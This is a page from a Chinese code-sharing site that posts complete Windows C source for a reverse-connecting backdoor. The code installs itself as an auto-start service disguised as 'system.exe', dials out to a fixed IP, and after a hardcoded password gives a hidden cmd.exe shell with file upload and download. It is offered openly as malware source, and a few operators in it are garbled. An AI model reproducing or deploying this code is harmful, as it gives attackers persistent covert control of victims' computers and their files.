实例介绍
【实例简介】
【实例截图】
【核心代码】
#include <stdio.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") void WINAPI ServiceMain(DWORD,LPTSTR *); DWORD WINAPI CmdService(LPVOID); DWORD WINAPI CmdShell(LPVOID); void WINAPI ServiceCtrlHandler(DWORD Opcode); BOOL InstallCmdService(); void DelServices(); int door(); void Usage(void); VOID WINAPI EXEBackMain (LPVOID s); SERVICE_STATUS m_ServiceStatus; SERVICE_STATUS_HANDLE m_ServiceStatusHandle; BOOL bRunning=true; BOOL flag=true; #define PASSSUCCESS "Password success!\n" #define PASSERROR "Password error.\n" #define BYEBYE "ByeBye!\n" #define WSAerron WSAGetLastError() #define erron GetLastError() #define PORT 80 //远程的连接端口 #define DEST_IP_ADDR "192.168.181.128"//要连接的远程IP int main(int argc,char *argv[]) { SERVICE_TABLE_ENTRY DispatchTable[] = { {"system",ServiceMain},//服务程序的名称和入口点(函数) {NULL ,NULL }//SERVICE_TABLE_ENTRY结构必须以“NULL”结束; }; if(argc==1) door(); if(argc==2) { if(!stricmp(argv[1],"-i"))//如果第二个参数等于-install { InstallCmdService(); } else if(!stricmp(argv[1],"-r"))//比较字符串s1和s2 { DelServices(); } else { Usage(); } return 0; } StartServiceCtrlDispatcher(DispatchTable);//把入口点的地址传入 return 0; } int door () { SOCKET sock=NULL; struct sockaddr_in sai; TCHAR UserPass[20]={0}; //用户设置密码缓冲 TCHAR PassBuf[20]={0}; //接收密码缓冲 TCHAR PassBanner[]="Password:"; TCHAR Banner[]="--------- backdoor---------\n"; sai.sin_family=AF_INET; sai.sin_addr.s_addr=inet_addr(DEST_IP_ADDR); sai.sin_port=htons(PORT); //sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); while (TRUE) { WSADATA wsadata; BOOL ThreadFlag=FALSE; DWORD ThreadID=0; int nRet=0; nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化 if (nRet) { return 0; } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sock==INVALID_SOCKET) { goto Clean; } nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr)); Sleep(3000); if (nRet!=SOCKET_ERROR) { nRet=send(sock,Banner,sizeof (Banner),0); while (TRUE) { nRet=send(sock,PassBanner,sizeof (PassBanner),0); nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0); if (strnicmp(PassBuf,"wangrun",strlen("wangrun"))==0) { send(sock,PASSSUCCESS,sizeof (PASSSUCCESS),0); ThreadFlag=TRUE; break; } if (nRet==SOCKET_ERROR) { goto Clean; } Sleep(100); } if (ThreadFlag) { CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,(LPVOID)sock,0,&ThreadID); while(flag) {} flag=true; } } Sleep(1000); } Clean: if (sock!=NULL) closesocket(sock); WSACleanup(); return 0; } void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv) //服务主函数 { m_ServiceStatus.dwServiceType = SERVICE_WIN32; m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; m_ServiceStatus.dwWin32ExitCode = 0; m_ServiceStatus.dwServiceSpecificExitCode = 0; m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; m_ServiceStatusHandle = RegisterServiceCtrlHandler("system",ServiceCtrlHandler); if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)return; m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; //设置服务状态 m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; //SERVICE_STATUS结构含有七个成员,它们反映服务的现行状态。 //所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置 if( SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus)) bRunning=true; door(); //启动服务程序 return; } void WINAPI ServiceCtrlHandler(DWORD Opcode)//服务控制函数 { switch(Opcode) { case SERVICE_CONTROL_PAUSE: // we accept the command to pause it m_ServiceStatus.dwCurrentState = SERVICE_PAUSED; break; case SERVICE_CONTROL_CONTINUE: m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; break; case SERVICE_CONTROL_STOP: m_ServiceStatus.dwWin32ExitCode = 0; m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus); bRunning=false; break; case SERVICE_CONTROL_INTERROGATE: break; } return; } BOOL InstallCmdService()//安装服务函数 { char strDir[1024]; SC_HANDLE schSCManager,schService; GetCurrentDirectory(1024,strDir);//取当前目录 GetModuleFileName(NULL,strDir,sizeof(strDir)); //取当前文件路径和文件名 char chSysPath[1024]; GetSystemDirectory(chSysPath,sizeof(chSysPath));//取系统目录 strcat(chSysPath,"\\system.exe"); //将scvhost.exe拼接到系统目录 if(CopyFile(strDir,chSysPath,FALSE))printf("Copy file OK\n"); // 把当前服务程序复制到系统根目录为system.exe strcpy(strDir,chSysPath); schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) { printf("open scmanger failed,maybe you do not have the privilage to do this\n"); return false; } LPCTSTR lpszBinaryPathName=strDir; schService = CreateService(schSCManager, "system", "system", //将服务的信息添加到SCM的数据库 SERVICE_ALL_ACCESS, // desired access SERVICE_WIN32_OWN_PROCESS, // service type SERVICE_AUTO_START, // start type SERVICE_ERROR_NORMAL, // error control type lpszBinaryPathName, // service's binary NULL, // no load ordering group NULL, // no tag identifier NULL, // no dependencies NULL, // LocalSystem account NULL); // no password if (schService) printf("Install Service Success!\n"); else return false; CloseServiceHandle(schService); return true; } void DelServices() { char name[100]; SC_HANDLE scm; SC_HANDLE service; SERVICE_STATUS status; strcpy(name,"system"); if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL) { printf("OpenSCManager Error "); } service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE); if (!service) { printf("OpenService error! "); return; } BOOL isSuccess=QueryServiceStatus(service,&status); if (!isSuccess) { printf("QueryServiceStatus error! "); return; } if ( status.dwCurrentState!=SERVICE_STOPPED ) { isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status); if (!isSuccess ) printf("Stop Service error! "); Sleep( 500 ); } isSuccess=DeleteService(service); if (!isSuccess) printf("Delete Service Fail!"); else printf("Delete Service Success! "); CloseServiceHandle(service ); CloseServiceHandle(scm); } VOID WINAPI EXEBackMain (LPVOID s) //BOOL EXEBackMain (SOCKET sock) { SOCKET sock=(SOCKET)s; STARTUPINFO si; PROCESS_INFORMATION pi; HANDLE hRead=NULL,hWrite=NULL; TCHAR CmdSign[]="\nwr:\\>"; while (TRUE) { TCHAR MsgError[50]={0}; //错误消息缓冲 TCHAR Cmdline[300]={0}; //命令行缓冲 TCHAR RecvBuf[1024]={0}; //接收缓冲 TCHAR SendBuf[2048]={0}; //发送缓冲 char *filename; SECURITY_ATTRIBUTES sa; DWORD bytesRead=0; int ret=0,size,i; FILE *fp; sa.nLength=sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor=NULL; sa.bInheritHandle=TRUE; //创建匿名管道 if (!CreatePipe(&hRead,&hWrite,&sa,0)) { goto Clean; } si.cb=sizeof(STARTUPINFO); GetStartupInfo(&si); si.hStdError=hWrite; si.hStdOutput=hWrite; //进程(cmd)的输出写入管道 si.wShowWindow=SW_HIDE; si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录 strcat(Cmdline,"\\cmd.exe /c "); //拼接cmd /*ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符 if (ret==SOCKET_ERROR) { goto Clean; }*/ ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据 //如果为exit或quit,就退出 if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0) { send(sock,BYEBYE,sizeof (BYEBYE),0); goto Clean; } //upload if (strnicmp(RecvBuf,"upload",6)==0) { filename=RecvBuf 7; if((fp=fopen(filename,"wb"))==NULL) { printf("can't open file \n"); continue; } printf("%s is recving ...\n",filename); recv(sock,(char *)&size,sizeof(size),0); i=0; while((ret=recv(sock,RecvBuf,sizeof (RecvBuf),0))>0) { i =ret; fwrite(RecvBuf,ret,1,fp); memset(RecvBuf,0,sizeof(RecvBuf)); if(i==size) { printf("transport successful!\n"); break; } } fclose(fp); } //download if (strnicmp(RecvBuf,"download",8)==0) { filename=RecvBuf 9; if((fp=fopen(filename,"rb"))==NULL) { printf("can't open file \n"); continue; } printf("%s is sending ...\n",filename); fseek(fp,0,SEEK_END); size=ftell(fp); fseek(fp,0,SEEK_SET); send(sock,(char *)&size,sizeof(size),0); while((ret=fread(SendBuf,1,1024,fp))>0) { send(sock,SendBuf,ret,0); memset(SendBuf,0,sizeof(SendBuf)); } fclose(fp); printf("transport successful!\n"); } //表示对方已经断开 if (ret==SOCKET_ERROR) { goto Clean; } //表示接收数据出错 if (ret<=0) { #ifdef DEBUGMSG sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif continue; } Sleep(100); strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令 //创建进程,也就是执行cmd命令 if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { continue; } CloseHandle(hWrite); while (TRUE) { //无限循环读取管道中的数据,直到管道中没有数据为止 if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0) break; send(sock,SendBuf,bytesRead,0); //发送出去 memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零 Sleep(100); } } Clean: //释放句柄 if (hRead!=NULL) CloseHandle(hRead); if (hWrite!=NULL) CloseHandle(hWrite); //释放SOCKET if (sock!=NULL) closesocket(sock); flag=false; WSACleanup(); ExitThread(0); //return 0; } void Usage() { fprintf(stderr,"Code by wangrun\n""Usage:%s [-i] [-r] -i: install service; -r: remove service.\n"); }
好例子网口号:伸出你的我的手 — 分享!
小贴士
感谢您为本站写下的评论,您的评论对其它用户来说具有重要的参考价值,所以请认真填写。
- 类似“顶”、“沙发”之类没有营养的文字,对勤劳贡献的楼主来说是令人沮丧的反馈信息。
- 相信您也不想看到一排文字/表情墙,所以请不要反馈意义不大的重复字符,也请尽量不要纯表情的回复。
- 提问之前请再仔细看一遍楼主的说明,或许是您遗漏了。
- 请勿到处挖坑绊人、招贴广告。既占空间让人厌烦,又没人会搭理,于人于己都无利。
关于好例子网
本站旨在为广大IT学习爱好者提供一个非营利性互相学习交流分享平台。本站所有资源都可以被免费获取学习研究。本站资源来自网友分享,对搜索内容的合法性不具有预见性、识别性、控制性,仅供学习研究,请务必在下载后24小时内给予删除,不得用于其他任何用途,否则后果自负。基于互联网的特殊性,平台无法对用户传输的作品、信息、内容的权属或合法性、安全性、合规性、真实性、科学性、完整权、有效性等进行实质审查;无论平台是否已进行审查,用户均应自行承担因其传输的作品、信息、内容而可能或已经产生的侵权或权属纠纷等法律责任。本站所有资源不代表本站的观点或立场,基于网友分享,根据中国法律《信息网络传播权保护条例》第二十二与二十三条之规定,若资源存在侵权或相关问题请联系本站客服人员,点此联系我们。关于更多版权及免责申明参见 版权及免责申明
网友评论
我要评论